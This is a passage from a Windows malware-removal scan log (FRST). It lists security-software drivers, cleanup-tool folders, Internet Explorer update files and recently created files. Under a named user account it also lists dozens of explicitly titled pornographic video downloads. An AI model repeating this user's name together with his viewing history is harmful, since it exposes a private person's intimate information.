R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-05] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20141104.004\ENG64.SYS [129752 2014-08-21] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20141104.004\EX64.SYS [2137304 2014-08-21] (Symantec Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-10-30] (NVIDIA Corporation)
R1 SRTSP; C:\Windows\System32\Drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2013-09-09] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2013-12-27] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation)
S1 AntiLog32; \??\C:\Windows\system32\drivers\AntiLog64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-05 10:36 - 2014-11-05 10:37 - 00000000 ____D () C:\FRST
2014-11-05 10:33 - 2014-11-05 10:33 - 00000000 ___RD () C:\Users\JoseAlcazar\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2014-11-04 17:21 - 2014-11-04 17:26 - 635087215 ____R () C:\Users\JoseAlcazar\Downloads\Staxus - Alan Benfelen and Darko Simic Bareback Sex (720p).mp4
2014-11-04 17:20 - 2014-11-04 17:27 - 361453575 ____R () C:\Users\JoseAlcazar\Downloads\College Dudes - Owen Michaels Tops Roman Daniels (720p).mp4
2014-11-04 17:20 - 2014-11-04 17:22 - 308737532 ____R () C:\Users\JoseAlcazar\Downloads\Sweet And Raw - Alan William, Bruno and Gabriel [Bareback - 720p].mp4
2014-11-03 17:55 - 2014-11-03 17:57 - 278031976 ____R () C:\Users\JoseAlcazar\Downloads\sf_gage_joseph.wmv
2014-11-03 17:54 - 2014-11-03 18:00 - 450972087 ____R () C:\Users\JoseAlcazar\Downloads\[helixstudios.net] Lovers' Lookout (Andy Taylor, Troy Ryan).mp4
2014-11-03 17:53 - 2014-11-03 18:10 - 1267006785 ____R () C:\Users\JoseAlcazar\Downloads\[Icon Male] Prisoner Of War (2014).mp4
2014-11-02 13:49 - 2014-11-02 13:54 - 294746656 ____R () C:\Users\JoseAlcazar\Downloads\Tanned Twinks Threesome Fun.mp4
2014-11-02 12:26 - 2014-11-02 12:35 - 1394022488 ____R () C:\Users\JoseAlcazar\Downloads\Baitbus - Anal Pounding on the Baitbus (Paul Canon).mp4
2014-11-02 12:21 - 2014-11-02 12:27 - 490574405 ____R () C:\Users\JoseAlcazar\Downloads\[NextDoorTwink]My Folks Are Out Part Two (Damian Black, Tripp Townsend).mp4
2014-11-02 12:14 - 2014-11-02 12:28 - 490574404 ____R () C:\Users\JoseAlcazar\Downloads\NextDoorBuddies - My Folks Are Out, Part Two - Damian Black and Tripp Townsend.mp4
2014-11-02 12:14 - 2014-11-02 12:25 - 430922040 ____R () C:\Users\JoseAlcazar\Downloads\[NextDoorTwink] Raw Awakening (Trent Ferris, Sam Truitt).mp4
2014-11-01 11:12 - 2014-11-01 11:12 - 00000000 ____D () C:\NPE
2014-11-01 11:11 - 2014-11-01 11:19 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Local\NPE
2014-11-01 10:34 - 2014-11-01 10:37 - 433978146 ____R () C:\Users\JoseAlcazar\Downloads\Guys In Sweatpants - Jordan Barebacks Lukas Live.mp4
2014-11-01 10:32 - 2014-11-02 12:20 - 600955394 ____R () C:\Users\JoseAlcazar\Downloads\William Higgins - Ivan Mraz and Zdenek Bodbaba RAW - FULL CONTACT (720p).mp4
2014-10-31 14:26 - 2014-10-31 14:35 - 1039197249 ____R () C:\Users\JoseAlcazar\Downloads\ManRoyale - Mike Chambers and Calvin Cuffs - Close Shave (720p).mp4
2014-10-31 14:21 - 2014-10-31 14:24 - 501921666 ____R () C:\Users\JoseAlcazar\Downloads\[Broke Straight Boys] Brody Lasko, Ronan Kennedy, David Hardy, Ian Dempsey - Orgy.mp4
2014-10-31 14:20 - 2014-10-31 14:27 - 747348938 ____R () C:\Users\JoseAlcazar\Downloads\Staxus - Jace Reed and Johny Cruz Bareback (720p).mp4
2014-10-31 14:19 - 2014-10-31 14:21 - 365968130 ____R () C:\Users\JoseAlcazar\Downloads\College Dudes - Dante Monroe Tops Taylor Blaise (720p).mp4
2014-10-31 14:18 - 2014-10-31 14:20 - 275528316 ____R () C:\Users\JoseAlcazar\Downloads\[FraternityX] FX104 - Katy's A bleep.mp4
2014-10-31 14:06 - 2014-10-31 14:06 - 00026845 _____ () C:\Users\JoseAlcazar\Desktop\dds.txt
2014-10-31 14:06 - 2014-10-31 14:06 - 00011498 _____ () C:\Users\JoseAlcazar\Desktop\attach.txt
2014-10-30 15:56 - 2014-10-30 15:56 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-10-30 15:45 - 2014-10-30 15:45 - 00000639 _____ () C:\Users\JoseAlcazar\Desktop\JRT.txt
2014-10-30 15:37 - 2014-10-30 15:37 - 00000000 ____D () C:\Windows\ERUNT
2014-10-30 15:26 - 2014-10-30 15:29 - 00000000 ____D () C:\AdwCleaner
2014-10-30 15:26 - 2010-08-30 07:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-10-29 17:30 - 2014-10-29 17:36 - 490853410 ____R () C:\Users\JoseAlcazar\Downloads\Broke Straight Boys - Ayden Troy bleep Brody Lasko.mp4
2014-10-29 17:30 - 2014-10-29 17:35 - 327666191 ____R () C:\Users\JoseAlcazar\Downloads\Jason Sparks Live - Zach Lockhart and Declan McClain BAREBACK in Dallas (720p).mp4
2014-10-29 17:29 - 2014-10-29 17:34 - 411702082 ____R () C:\Users\JoseAlcazar\Downloads\BadPuppy - Farid and Ewin (720p).mp4
2014-10-28 19:43 - 2014-10-28 19:50 - 00002358 _____ () C:\Users\JoseAlcazar\Desktop\Rkill.txt
2014-10-28 18:42 - 2014-10-29 18:51 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-28 18:41 - 2014-10-29 18:51 - 00000000 ____D () C:\Users\JoseAlcazar\Desktop\mbar
2014-10-28 18:18 - 2014-11-05 10:33 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-28 18:17 - 2014-10-30 14:50 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-28 18:17 - 2014-10-30 14:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-28 18:17 - 2014-10-30 14:50 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-28 18:17 - 2014-10-01 10:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-28 18:17 - 2014-10-01 10:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-28 18:17 - 2014-10-01 10:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-28 18:14 - 2014-10-28 18:15 - 00047893 _____ () C:\Users\JoseAlcazar\Desktop\Result.txt
2014-10-28 18:13 - 2014-10-28 18:13 - 00002774 _____ () C:\Users\JoseAlcazar\Desktop\FSS.txt
2014-10-27 18:14 - 2014-10-27 18:22 - 813043899 ____R () C:\Users\JoseAlcazar\Downloads\[Extra Big Dicks] Useless Banana (Sam Truit, Trevor Spade).mp4
2014-10-27 18:06 - 2014-10-27 18:19 - 1017683417 ____R () C:\Users\JoseAlcazar\Downloads\Staxus - lan Benfelen, Arthur Kral and Jaro Stone (720p).mp4
2014-10-27 18:05 - 2014-10-27 18:13 - 730396565 ____R () C:\Users\JoseAlcazar\Downloads\Staxus - Carlos Santiago and David Hanson.mp4
2014-10-27 18:04 - 2014-10-27 18:22 - 664328383 ____R () C:\Users\JoseAlcazar\Downloads\Staxus - Devon LeBron, Felipe Esquivel, Tim Law.mp4
2014-10-26 14:13 - 2014-10-26 14:17 - 503681935 ____R () C:\Users\JoseAlcazar\Downloads\[ND] Alex Dupre and Drake Tyler.mp4
2014-10-26 11:07 - 2014-10-26 14:19 - 315312112 ____R () C:\Users\JoseAlcazar\Downloads\MasonWyler - Mason & Anthony.wmv
2014-10-26 10:50 - 2014-10-26 10:51 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\Helix - 8Teenboy - Yoga Thunder
2014-10-26 10:46 - 2014-10-26 10:46 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\[Staxus] Lloyd Goldwyn and Tim Law
2014-10-25 18:25 - 2014-10-25 18:25 - 00000000 ____D () C:\ProgramData\Atheros
2014-10-25 18:20 - 2014-10-25 18:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BT Program
2014-10-25 18:20 - 2014-10-25 18:20 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\Atheros
2014-10-25 18:19 - 2012-12-27 04:05 - 00439296 _____ (Atheros) C:\Windows\system32\athihvs.dll
2014-10-25 18:07 - 2014-11-04 18:20 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-10-25 18:07 - 2014-10-25 18:07 - 00004010 _____ () C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2014-10-25 18:07 - 2014-10-25 18:07 - 00003220 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-10-25 18:07 - 2014-10-25 18:07 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\Dell
2014-10-25 18:07 - 2014-10-25 18:07 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-10-25 18:07 - 2014-10-25 18:07 - 00000000 ____D () C:\Program Files\My Dell
2014-10-25 18:06 - 2014-10-25 18:07 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-10-25 18:06 - 2014-10-25 18:06 - 00000000 ____D () C:\ProgramData\PCDr
2014-10-25 18:05 - 2014-10-26 11:30 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\PCDr
2014-10-25 18:03 - 2014-10-25 18:03 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-10-25 18:03 - 2014-10-25 18:03 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Local\Deployment
2014-10-25 18:03 - 2014-10-25 18:03 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Local\Apps\2.0
2014-10-25 12:22 - 2014-10-25 12:24 - 402018317 ____R () C:\Users\JoseAlcazar\Downloads\Broke Straight Boys - Paul Canon bleep Conner Chesney (720p).mp4
2014-10-24 16:01 - 2014-10-24 16:04 - 288629724 ____R () C:\Users\JoseAlcazar\Downloads\[Staxus] Marty Love, John Parker & Mike Cage.mp4
2014-10-24 15:57 - 2014-10-24 16:00 - 353971131 ____R () C:\Users\JoseAlcazar\Downloads\[FraternityX] FX086 Wake and bleep.mp4
2014-10-24 15:55 - 2014-10-24 16:06 - 783669842 ____R () C:\Users\JoseAlcazar\Downloads\MEN - Drill My Hole - Daddy’s Workplace Part 3  - Johnny Forza & Matthew Ryder.mp4
2014-10-24 15:37 - 2014-11-05 10:33 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-10-23 15:53 - 2014-10-23 16:00 - 1089156850 ____R () C:\Users\JoseAlcazar\Downloads\[Staxus] - Alexander Dorch & Jace Reed.mp4
2014-10-23 15:41 - 2014-10-23 15:42 - 176548999 ____R () C:\Users\JoseAlcazar\Downloads\[Hotboys] Brazilian - Ricardo & Matheus.mp4
2014-10-23 15:38 - 2014-10-23 16:00 - 517093257 ____R () C:\Users\JoseAlcazar\Downloads\Helix Studios - Andy Taylor and Bastian Hart -Moving Day (720p).mp4
2014-10-22 18:07 - 2014-10-22 18:14 - 547251344 ____R () C:\Users\JoseAlcazar\Downloads\Randy Blue -2778- Brett Swanson & Ashton Dale.mp4
2014-10-21 18:40 - 2014-10-21 18:46 - 906787096 ____R () C:\Users\JoseAlcazar\Downloads\[Staxus] Carl Bodman & Sven Laarson.mp4
2014-10-21 18:38 - 2014-10-21 18:41 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\BelAmi Online - Rocco Alfieri, Tom Pollock
2014-10-20 17:08 - 2014-10-20 17:14 - 376903261 ____R () C:\Users\JoseAlcazar\Downloads\Helix - Evan Parker & Collin Payne.mp4
2014-10-20 17:03 - 2014-10-20 17:08 - 741652589 ____R () C:\Users\JoseAlcazar\Downloads\Randy Blue -2777- Scotty Marx & Zane Porter.mp4
2014-10-20 17:00 - 2014-10-20 17:03 - 273361099 ____R () C:\Users\JoseAlcazar\Downloads\Straight Fraternity - JC's First Time.mp4
2014-10-20 16:54 - 2014-10-20 17:04 - 688785307 ____R () C:\Users\JoseAlcazar\Downloads\Counselor week at Camp Liberty.mp4
2014-10-20 16:54 - 2014-10-20 17:03 - 805604166 ____R () C:\Users\JoseAlcazar\Downloads\Staxus - Hot Beach Foursome - Orlando White, Pedro Ribeiro, Micky Taylor & Paul Walker.mp4
2014-10-20 16:51 - 2014-10-20 17:00 - 349632813 ____R () C:\Users\JoseAlcazar\Downloads\GayHoopla - Jeff Niels, Ken Ott and Max Summerfield - Edge of Desire  Part 3 (720p).mp4
2014-10-18 15:27 - 2014-10-18 15:30 - 371996869 ____R () C:\Users\JoseAlcazar\Downloads\[Wank This] Andrew Doncaster Slams Javier Cruz Bareback.mp4
2014-10-18 09:31 - 2014-10-18 15:31 - 224299540 ____R () C:\Users\JoseAlcazar\Downloads\[TIM] It's bleep Big (CHRISTIAN, ESTEBAN).mov
2014-10-18 09:31 - 2014-10-18 09:37 - 377709095 ____R () C:\Users\JoseAlcazar\Downloads\[Dallas Reeves] Donny Forza and Vadim Black Bare Flip.mp4
2014-10-17 17:42 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-17 17:36 - 2014-10-17 17:41 - 732691202 ____R () C:\Users\JoseAlcazar\Downloads\MEN - Men Collector Part 2 - Christian Wilde and Tyler Sweet (720p).mp4
2014-10-17 17:32 - 2014-10-17 17:37 - 523164546 ____R () C:\Users\JoseAlcazar\Downloads\Cocky Boys - Pierre Fitch and Jaxon Radoc Flip-bleep (720p).mp4
2014-10-17 17:25 - 2014-10-17 17:40 - 622781052 ____R () C:\Users\JoseAlcazar\Downloads\bleeperMate - David Montenegro and Ian Grey (720p).mp4
2014-10-17 17:24 - 2014-10-17 17:35 - 777155794 ____R () C:\Users\JoseAlcazar\Downloads\[Staxus] Jace Reed, Johny Cruz and Yuri Adamov [Bareback - 720p].mp4
2014-10-17 17:21 - 2014-10-17 17:31 - 1016718711 ____R () C:\Users\JoseAlcazar\Downloads\BelAmiOnline - 9235 - Sex Scenes, Condom Free; Jean-Daniel & Rhys Jagger 20140622 (FHDQ, 22,01 min).mp4
2014-10-17 17:21 - 2014-10-17 17:25 - 268899801 ____R () C:\Users\JoseAlcazar\Downloads\[FraternityX] FX098 - Ass to Mouth - ATM.mp4
2014-10-17 17:21 - 2014-10-17 17:24 - 265072239 ____R () C:\Users\JoseAlcazar\Downloads\Broke Straight Boys - Blake Savage bleep Brandon Beal Raw.mp4
2014-10-17 17:19 - 2014-10-17 17:19 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\Oracle
2014-10-17 17:18 - 2014-10-17 17:18 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-17 17:18 - 2014-10-17 17:18 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-17 17:18 - 2014-10-17 17:18 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-17 17:18 - 2014-10-17 17:18 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-17 17:18 - 2014-10-17 17:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-10-17 17:18 - 2014-10-17 17:18 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-16 10:37 - 2014-10-16 10:37 - 00000000 __SHD () C:\Users\JoseAlcazar\AppData\Local\EmieUserList
2014-10-16 10:37 - 2014-10-16 10:37 - 00000000 __SHD () C:\Users\JoseAlcazar\AppData\Local\EmieSiteList
2014-10-16 10:37 - 2014-10-16 10:37 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Security Suite
2014-10-16 10:15 - 2014-10-16 10:15 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-16 10:15 - 2014-10-16 10:15 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-16 10:15 - 2014-10-16 10:15 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-16 10:15 - 2014-10-16 10:15 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-16 10:15 - 2014-10-16 10:15 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00774144 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00645120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsIntl.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00616104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dat
2014-10-16 10:15 - 2014-10-16 10:15 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat
2014-10-16 10:15 - 2014-10-16 10:15 - 00610304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00413696 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-16 10:15 - 2014-10-16 10:15 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2014-10-16 10:15 - 2014-10-16 10:15 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00247808 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00233472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00208384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00194048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\elshyph.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00182272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msls31.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00167424 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00151552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iexpress.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00147968 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00139264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00131072 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00127488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00111616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IEAdvpack.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00105984 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00101376 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00086016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2014-10-16 10:15 - 2014-10-16 10:15 - 00074240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SetIEInstalledDate.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardie.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2014-10-16 10:15 - 2014-10-16 10:15 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00056832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pngfilt.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmler.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll
